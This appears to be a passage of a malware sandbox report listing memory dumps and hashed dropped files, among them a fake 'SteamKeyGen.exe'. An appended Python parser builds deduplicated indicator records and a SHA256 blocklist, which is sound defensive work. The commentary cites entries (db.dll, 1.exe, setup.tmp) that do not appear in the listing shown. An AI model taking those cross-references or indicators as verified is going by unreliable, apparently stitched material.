memory/780-345-0x0000000000880000-0x0000000000888000-memory.dmp
memory/4124-342-0x0000000000000000-mapping.dmp
memory/2516-324-0x0000000000000000-mapping.dmp
memory/1836-317-0x0000000000950000-0x0000000000A2E000-memory.dmp
memory/1688-316-0x0000000000000000-mapping.dmp
memory/3132-315-0x0000000000000000-mapping.dmp
memory/4976-314-0x00000000004B0000-0x00000000004B8000-memory.dmp
memory/4408-309-0x00000000055E0000-0x0000000005BF8000-memory.dmp
memory/4288-306-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/1836-305-0x0000000000A40000-0x0000000000A41000-memory.dmp
memory/4288-303-0x0000000076C80000-0x0000000076E95000-memory.dmp
memory/1400-292-0x0000000000000000-mapping.dmp
memory/4288-291-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/2800-290-0x0000000000400000-0x00000000004CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6AHD0.exe
| MD5 | 5e2b57ba7e724923726235f4bab6dc3a |
| SHA1 | 717d816d000606d9778328d5400cb200d5a32aba |
| SHA256 | ebccec79dade98b555e165fc883e7832fb86a1178e5c9ef807a947a9ce8141de |
| SHA512 | 79efb25d12371af32eda91f5896cca07fb917aa563e951aeb06f223b52ed5d018c31055cf55e73ad32ce821c7d54d8cb695fa5c63ee62b6225f0739d6166523b |
memory/1036-347-0x0000000000000000-mapping.dmp
memory/2420-350-0x0000000002CC0000-0x0000000002CC2000-memory.dmp
memory/1036-353-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/2032-356-0x0000000000632000-0x0000000000659000-memory.dmp
memory/4924-357-0x0000000000160000-0x000000000053B000-memory.dmp
memory/1036-360-0x000002D078310000-0x000002D078312000-memory.dmp
memory/2032-361-0x0000000000400000-0x0000000000481000-memory.dmp
memory/4924-363-0x0000000077A40000-0x0000000077BE3000-memory.dmp
memory/4288-364-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/4508-366-0x0000000000000000-mapping.dmp
memory/5052-365-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/4516-359-0x0000000000000000-mapping.dmp
memory/2032-358-0x00000000005C0000-0x0000000000604000-memory.dmp
memory/3176-368-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/3176-369-0x0000000000C40000-0x0000000000C42000-memory.dmp
memory/1036-355-0x000002D0766C0000-0x000002D0766C6000-memory.dmp
memory/1836-371-0x0000000000F00000-0x0000000000F46000-memory.dmp
memory/4288-370-0x0000000002B30000-0x0000000002B76000-memory.dmp
memory/4924-352-0x0000000000B90000-0x0000000000BD4000-memory.dmp
memory/2420-346-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4196-349-0x0000000000660000-0x0000000000700000-memory.dmp
memory/4228-348-0x0000000000000000-mapping.dmp
memory/3176-282-0x0000000000710000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nse6079.tmp\nsisdl.dll
| MD5 | ee68463fed225c5c98d800bdbd205598 |
| SHA1 | 306364af624de3028e2078c4d8c234fa497bd723 |
| SHA256 | 419485a096bc7d95f872ed1b9b7b5c537231183d710363beee4d235bb79dbe04 |
| SHA512 | b14fb74cb76b8f4e80fdd75b44adac3605883e2dcdb06b870811759d82fa2ec732cd63301f20a2168d7ad74510f62572818f90038f5116fe19c899eba68a5107 |
memory/4288-280-0x0000000000000000-mapping.dmp
C:\Users\Public\SteamKeyGen.exe
| MD5 | c523d423234494eeb7b60a892d7a4bea |
| SHA1 | db992908237ee2ab5c07f4362b9a29516ac09a5d |
| SHA256 | 98c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3 |
| SHA512 | 0aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec |
memory/5052-275-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/2984-273-0x0000000000000000-mapping.dmp
memory/3176-272-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
| MD5 | 35fcec704d7072157fd5fdc35b543904 |
| SHA1 | 34677f3d61028d45d87b952c9ec1f851729981a9 |
| SHA256 | 9a49d97abc9f621287365999038cf919581abba2d89fcc1daf704bd34b298859 |
| SHA512 | 863500aa8acc3f35ad346b7d2a8037d2b5a40810baee99f0ab7333f6fbdad4234d789a0d857cf884490a2c0b3b87c70318a09b85f762f0b5340f7b2bfaa09197 |
memory/1836-373-0x0000000000950000-0x0000000000A2E000-memory.dmp
memory/4288-372-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/1836-374-0x0000000000950000-0x0000000000A2E000-memory.dmp
memory/4976-375-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4976-376-0x0000000000D10000-0x0000000000D12000-memory.dmp
memory/1688-378-0x0000000000630000-0x0000000000707000-memory.dmp
memory/5512-379-0x0000000000000000-mapping.dmp
memory/4472-380-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4472-381-0x0000000000940000-0x0000000000942000-memory.dmp
memory/1688-382-0x0000000000630000-0x0000000000707000-memory.dmp
memory/4196-384-0x0000000002E40000-0x0000000002E86000-memory.dmp
memory/4196-385-0x0000000000660000-0x0000000000700000-memory.dmp
memory/4408-386-0x0000000005420000-0x0000000005496000-memory.dmp
memory/780-389-0x0000000002850000-0x0000000002852000-memory.dmp
memory/4196-390-0x00000000064A0000-0x0000000006532000-memory.dmp
memory/5584-391-0x0000000000000000-mapping.dmp
memory/5640-392-0x0000000000000000-mapping.dmp
memory/4196-393-0x0000000006480000-0x000000000648A000-memory.dmp
memory/780-388-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4196-387-0x0000000006960000-0x0000000006F04000-memory.dmp
memory/5552-383-0x0000000000000000-mapping.dmp
memory/5808-394-0x0000000000000000-mapping.dmp
memory/1688-377-0x0000000002C80000-0x0000000002CC6000-memory.dmp
memory/5892-395-0x0000000000000000-mapping.dmp
memory/4452-396-0x0000000002412000-0x00000000026DB000-memory.dmp
memory/4452-397-0x00000000026E0000-0x00000000029CC000-memory.dmp
memory/1688-398-0x0000000008A60000-0x0000000008AC6000-memory.dmp
memory/1836-399-0x0000000006A40000-0x0000000006A5E000-memory.dmp
memory/5160-400-0x0000000000000000-mapping.dmp
memory/1972-403-0x0000000000000000-mapping.dmp
memory/5360-404-0x0000000000000000-mapping.dmp
memory/5628-405-0x0000000000000000-mapping.dmp
memory/1688-408-0x0000000009870000-0x0000000009A32000-memory.dmp
memory/4408-407-0x0000000006A30000-0x0000000006A80000-memory.dmp
memory/5728-406-0x0000000000000000-mapping.dmp
memory/5800-411-0x0000000000000000-mapping.dmp
memory/6024-413-0x0000000000000000-mapping.dmp
memory/2436-415-0x0000000000000000-mapping.dmp
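The listing above is a flat extraction of the report's dropped-file hash tables and memory-dump names: a path line, the headerless `| MD5 | ... |` rows for that file, and `memory/...dmp` lines interleaved in the order the sandbox wrote them. A listing of this kind can repeat an entry when the same file is written more than once, so anything consuming it has to dedupe rather than trust the raw count. The following is an added example, not the report's or the sandbox vendor's code: a Python parser that turns such text into deduplicated file records with a sanity check on digest length, a sorted SHA256 list of the kind a blocklist or retro-hunt ingests, and a breakdown of the memory dumps by process and region. The sample text is copied from entries in this listing (SHA1 and SHA512 rows dropped for brevity). Reading the first number in a dump name as the process id and the second as a per-report sequence counter, and treating `-mapping.dmp` names as carrying no address range, are assumptions about the naming scheme, not something the report states.

```python
"""Parse a flattened sandbox dropped-file / memory-dump listing into IOC records.
Added example; not the report's or the sandbox vendor's code."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}  # hex digits
WIN_PATH = re.compile(r"^[A-Za-z]:\\")
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
# Assumption: memory/<pid>-<seq>-...; '-mapping.dmp' names carry no address range.
MEMORY_LINE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+)-memory|-mapping)\.dmp$"
)

@dataclass
class DroppedFile:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)
    occurrences: int = 1  # how many times the listing repeated this entry

    def is_consistent(self) -> bool:
        """Every digest must have the length its algorithm produces."""
        return all(len(v) == HASH_LEN[k] for k, v in self.hashes.items())

@dataclass
class MemoryDump:
    pid: int
    seq: int
    start: int
    end: Optional[int]  # None for a mapping dump

def parse_listing(text: str) -> Tuple[List[DroppedFile], List[MemoryDump]]:
    """A path line opens a record, the hash rows after it fill it in, and a
    memory line or any other text closes it. Repeats are kept for dedupe()."""
    entries: List[DroppedFile] = []
    dumps: List[MemoryDump] = []
    current: Optional[DroppedFile] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMORY_LINE.match(line)
        if m:
            end = m.group("end")
            dumps.append(MemoryDump(int(m.group("pid")), int(m.group("seq")),
                                    int(m.group("start"), 16),
                                    int(end, 16) if end else None))
            current = None
            continue
        m = HASH_ROW.match(line)
        if m and current is not None:
            current.hashes[m.group(1)] = m.group(2).lower()
            continue
        if WIN_PATH.match(line):
            current = DroppedFile(path=line)
            entries.append(current)
            continue
        current = None  # unrelated text ends the open record
    return entries, dumps

def dedupe(entries: List[DroppedFile]) -> List[DroppedFile]:
    """Merge entries sharing path and SHA256, counting repeats; keep first-seen order."""
    merged: Dict[Tuple[str, Optional[str]], DroppedFile] = {}
    for e in entries:
        key = (e.path.lower(), e.hashes.get("SHA256"))
        if key in merged:
            merged[key].occurrences += 1
        else:
            merged[key] = DroppedFile(e.path, dict(e.hashes), 1)
    return list(merged.values())

def sha256_blocklist(files: List[DroppedFile]) -> List[str]:
    """Sorted unique SHA256 digests, the shape a blocklist or retro-hunt wants."""
    return sorted({f.hashes["SHA256"] for f in files if "SHA256" in f.hashes})

def dumps_per_pid(dumps: List[MemoryDump]) -> Counter:
    return Counter(d.pid for d in dumps)

def unique_regions(dumps: List[MemoryDump]) -> set:
    """Distinct (pid, start, end); one region dumped again and again suggests
    the sandbox re-captured the same unpacking image at successive points."""
    return {(d.pid, d.start, d.end) for d in dumps if d.end is not None}

# Sample copied from this report's listing (SHA1/SHA512 rows dropped for brevity).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\db.dll
| MD5 | bdbd4096939e9072429ccfb446043270 |
| SHA256 | fbb2fce3724c542e1b985be9a7d118a566b1c8e87fa4e329da63e90c73bc38e4 |
memory/4924-197-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\db.dll
| MD5 | bdbd4096939e9072429ccfb446043270 |
| SHA256 | fbb2fce3724c542e1b985be9a7d118a566b1c8e87fa4e329da63e90c73bc38e4 |
memory/4924-220-0x0000000000160000-0x000000000053B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1.exe
| MD5 | 0570384defed524db1378486dec84b6c |
| SHA256 | 495b412404af5fc597de31a84cbddf175ea4859c9922b012cf0035406a87c29f |
memory/4924-237-0x0000000000160000-0x000000000053B000-memory.dmp
memory/5112-227-0x0000000140000000-0x00000001406CA000-memory.dmp
"""
```

Run it with `entries, dumps = parse_listing(SAMPLE)` and then `dedupe(entries)`: the two db.dll entries collapse into one record with `occurrences == 2`, `sha256_blocklist` yields the two digests ready to paste into a hash-based rule, and `unique_regions` shows that the three dumps of PID 4924 in the sample cover one region (0x160000 to 0x53B000, repeatedly captured) plus a mapping dump, while PID 5112 was dumped at its 0x140000000 image base. The dedupe key pairs path with SHA256 deliberately: the same digest under two paths (as with the two `setup.tmp` entries in this listing) stays as two records, because the path is part of the indicator.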